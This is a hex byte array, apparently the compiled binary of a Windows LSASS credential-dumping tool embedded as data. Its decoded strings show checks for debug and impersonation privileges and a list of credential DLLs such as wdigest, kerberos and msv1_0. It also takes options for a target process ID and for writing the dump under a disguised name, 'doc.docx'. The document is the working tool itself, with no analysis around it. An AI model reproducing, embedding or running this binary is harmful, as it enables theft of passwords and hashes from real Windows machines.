x6F,0x74,0x20,0x69,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x20,0x4C,0x4F,0x43,0x41,0x4C,0x20,0x53,0x45,0x52,0x56,0x49,0x43,0x45,0x00,0x5C,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x72,0x65,0x61,0x64,0x20,0x4C,0x53,0x41,0x53,0x53,0x2C,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3A,0x20,0x53,0x54,0x41,0x54,0x55,0x53,0x5F,0x41,0x43,0x43,0x45,0x53,0x53,0x5F,0x44,0x45,0x4E,0x49,0x45,0x44,0x00,0x0A,0x00,0x00,0x00,0x00,0x46,0x61,0x69,0x6C,0x65,0x64,0x20,0x74,0x6F,0x20,0x72,0x65,0x61,0x64,0x20,0x4C,0x53,0x41,0x53,0x53,0x2C,0x20,0x73,0x74,0x61,0x74,0x75,0x73,0x3A,0x20,0x30,0x78,0x25,0x6C,0x78,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x73,0x65,0x6C,0x65,0x63,0x74,0x65,0x64,0x20,0x70,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x69,0x73,0x20,0x6E,0x6F,0x74,0x20,0x4C,0x53,0x41,0x53,0x53,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x49,0x00,0x6D,0x00,0x70,0x00,0x65,0x00,0x72,0x00,0x73,0x00,0x6F,0x00,0x6E,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x65,0x6E,0x61,0x62,0x6C,0x65,0x20,0x53,0x65,0x49,0x6D,0x70,0x65,0x72,0x73,0x6F,0x6E,0x61,0x74,0x65,0x50,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x0A,0x00,0x00,0x00,0x00,0x53,0x00,0x65,0x00,0x44,0x00,0x65,0x00,0x62,0x00,0x75,0x00,0x67,0x00,0x50,0x00,0x72,0x00,0x69,0x00,0x76,0x00,0x69,0x00,0x6C,0x00,0x65,0x00,0x67,0x00,0x65,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x43,0x6F,0x75,0x6C,0x64,0x20,0x6E,0x6F,0x74,0x20,0x65,0x6E,0x61,0x62,0x6C,0x65,0x20,0x53,0x65,0x44,0x65,0x62,0x75,0x67,0x50,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x00,0x00,0x00,0x41,0x20,0x70,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x20,0x69,0x73,0x20,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x3A,0x20,0x25,0x6C,0x73,0x2E,0x20,0x41,0x72,0x65,0x20,0x79,0x6F,0x75,0x20,0x65,0x6C,0x65,0x76,0x61,0x74,0x65,0x64,0x3F,0x00,0x41,0x20,0x70,0x72,0x69,0x76,0x69,0x6C,0x65,0x67,0x65,0x20,0x69,0x73,0x20,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x3A,0x20,0x25,0x6C,0x73,0x00,0x00,0x41,0x00,0x64,0x00,0x76,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x73,0x69,0x7A,0x65,0x20,0x65,0x78,0x63,0x65,0x65,0x64,0x73,0x20,0x74,0x68,0x65,0x20,0x33,0x32,0x2D,0x62,0x69,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x73,0x70,0x61,0x63,0x65,0x21,0x00,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x54,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x69,0x73,0x20,0x74,0x6F,0x6F,0x20,0x62,0x69,0x67,0x2C,0x20,0x70,0x6C,0x65,0x61,0x73,0x65,0x20,0x69,0x6E,0x63,0x72,0x65,0x61,0x73,0x65,0x20,0x44,0x55,0x4D,0x50,0x5F,0x4D,0x41,0x58,0x5F,0x53,0x49,0x5A,0x45,0x2E,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x31,0x00,0x5F,0x00,0x30,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x73,0x00,0x70,0x00,0x6B,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x64,0x00,0x69,0x00,0x67,0x00,0x65,0x00,0x73,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x65,0x00,0x72,0x00,0x62,0x00,0x65,0x00,0x72,0x00,0x6F,0x00,0x73,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x69,0x00,0x76,0x00,0x65,0x00,0x73,0x00,0x73,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x64,0x00,0x70,0x00,0x61,0x00,0x70,0x00,0x69,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6B,0x00,0x64,0x00,0x63,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6C,0x00,0x73,0x00,0x61,0x00,0x64,0x00,0x62,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x73,0x00,0x61,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x72,0x00,0x73,0x00,0x61,0x00,0x65,0x00,0x6E,0x00,0x68,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x6E,0x00,0x63,0x00,0x72,0x00,0x79,0x00,0x70,0x00,0x74,0x00,0x70,0x00,0x72,0x00,0x6F,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x65,0x00,0x76,0x00,0x65,0x00,0x6E,0x00,0x74,0x00,0x6C,0x00,0x6F,0x00,0x67,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x77,0x00,0x65,0x00,0x76,0x00,0x74,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x74,0x00,0x65,0x00,0x72,0x00,0x6D,0x00,0x73,0x00,0x72,0x00,0x76,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x63,0x00,0x6C,0x00,0x6F,0x00,0x75,0x00,0x64,0x00,0x61,0x00,0x70,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x53,0x00,0x68,0x00,0x65,0x00,0x6C,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x4B,0x00,0x65,0x00,0x72,0x00,0x6E,0x00,0x65,0x00,0x6C,0x00,0x33,0x00,0x32,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x2D,0x00,0x76,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x76,0x00,0x61,0x00,0x6C,0x00,0x69,0x00,0x64,0x00,0x00,0x00,0x2D,0x00,0x77,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x77,0x00,0x72,0x00,0x69,0x00,0x74,0x00,0x65,0x00,0x00,0x00,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x20,0x2D,0x2D,0x77,0x72,0x69,0x74,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x00,0x0A,0x00,0x2D,0x00,0x70,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x70,0x00,0x69,0x00,0x64,0x00,0x00,0x00,0x6D,0x69,0x73,0x73,0x69,0x6E,0x67,0x20,0x2D,0x2D,0x70,0x69,0x64,0x20,0x76,0x61,0x6C,0x75,0x65,0x00,0x2D,0x00,0x64,0x00,0x00,0x00,0x2D,0x00,0x2D,0x00,0x64,0x00,0x75,0x00,0x70,0x00,0x6C,0x00,0x69,0x00,0x63,0x00,0x61,0x00,0x74,0x00,0x65,0x00,0x00,0x00,0x69,0x6E,0x76,0x61,0x6C,0x69,0x64,0x20,0x61,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x3A,0x20,0x25,0x73,0x00,0x00,0x59,0x6F,0x75,0x20,0x6D,0x75,0x73,0x74,0x20,0x70,0x72,0x6F,0x76,0x69,0x64,0x65,0x20,0x74,0x68,0x65,0x20,0x64,0x75,0x6D,0x70,0x20,0x66,0x69,0x6C,0x65,0x3A,0x20,0x2D,0x2D,0x77,0x72,0x69,0x74,0x65,0x20,0x43,0x3A,0x5C,0x57,0x69,0x6E,0x64,0x6F,0x77,0x73,0x5C,0x54,0x65,0x6D,0x70,0x5C,0x64,0x6F,0x63,0x2E,0x64,0x6F,0x63,0x78,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0xDF,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x08,0xB0,0xC6,0xCA,0x01,0x00,0x00,0x00,0xCC,0x72,0xC6,0xCA,0x01,0x00,0x00,0x00,0x30,0xA0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x4D,0x69,0x6E,0x67,0x77,0x2D,0x77,0x36,0x34,0x20,0x72,0x75,0x6E,0x74,0x69,0x6D,0x65,0x20,0x66,0x61,0x69,0x6C,0x75,0x72,0x65,0x3A,0x0A,0x00,0x00,0x00,0x00,0x00,0x41,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x20,0x68,0x61,0x73,0x20,0x6E,0x6F,0x20,0x69,0x6D,0x61,0x67,0x65,0x2D,0x73,0x65,0x63,0x74,0x69,0x6F,0x6E,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x51,0x75,0x65,0x72,0x79,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x66,0x6F,0x72,0x20,0x25,0x64,0x20,0x62,0x79,0x74,0x65,0x73,0x20,0x61,0x74,0x20,0x61,0x64,0x64,0x72,0x65,0x73,0x73,0x20,0x25,0x70,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x56,0x69,0x72,0x74,0x75,0x61,0x6C,0x50,0x72,0x6F,0x74,0x65,0x63,0x74,0x20,0x66,0x61,0x69,0x6C,0x65,0x64,0x20,0x77,0x69,0x74,0x68,0x20,0x63,0x6F,0x64,0x65,0x20,0x30,0x78,0x25,0x78,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x70,0x72,0x6F,0x74,0x6F,0x63,0x6F,0x6C,0x20,0x76,0x65,0x72,0x73,0x69,0x6F,0x6E,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x20,0x55,0x6E,0x6B,0x6E,0x6F,0x77,0x6E,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x62,0x69,0x74,0x20,0x73,0x69,0x7A,0x65,0x20,0x25,0x64,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x25,0x64,0x20,0x62,0x69,0x74,0x20,0x70,0x73,0x65,0x75,0x64,0x6F,0x20,0x72,0x65,0x6C,0x6F,0x63,0x61,0x74,0x69,0x6F,0x6E,0x20,0x61,0x74,0x20,0x25,0x70,0x20,0x6F,0x75,0x74,0x20,0x6F,0x66,0x20,0x72,0x61,0x6E,0x67,0x65,0x2C,0x20,0x74,0x61,0x72,0x67,0x65,0x74,0x69,0x6E,0x67,0x20,0x25,0x70,0x2C,0x20,0x79,0x69,0x65,0x6C,0x64,0x69,0x6E,0x67,0x20,0x74,0x68,0x65,0x20,0x76,0x61,0x6C,0x75,0x65,0x20,0x25,0x70,0x2E,0x0A,0x00,0x00,0x00,0x00,0x00,0x00,0x6D,0x00,0x73,0x00,0x76,0x00,0x63,0x00,0x72,0x00,0x74,0x00,0x2E,0x00,0x64,0x00,0x6C,0x00,0x6C,0x00,0x00,0x00,0x76,0x73,0x70,0x72,0x69,0x6E,0x74,0x66,0x5F,0x73,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x30,0x00,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xE0,0xF1,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x24,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x24,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x60,0x1D,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC5,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xD0,0x72,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x24,0x00,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB0,0x72,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xB8,0x72,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xA0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x08,0xA0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0xA0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0xA0,0xC6,0xCA,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x47,0x43,0x43,0x3A,0x20,0x28,0x47,0x4E,0x55,0x29,0x20,0x31,0x33,0x2D,0x77,0x69,0x6E,0x33,0x32,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x0C,0x10,0x00,0x00,0x00,0x40,0x01,0x00,0x10,0x10,0x00,0x00,0xDF,0x11,0x00,0x00,0x04,0x40,0x01,0x00,0xE0,0x11,0x00,0x00,0x3C,0x13,0x00,0x00,0x1C,0x40,0x01,0x00,0x40,0x13,0x00,0x00,0x52,0x13,0x00,0x00,0x30,0x40,0x01,0x00,0x60,0x13,0x00,0x00,0x6F,0x13,0x00,0x00,0x34,0x40,0x01,0x00,0x70,0x13,0x00,0x00,0x7C,0x13,0x00,0x00,0x38,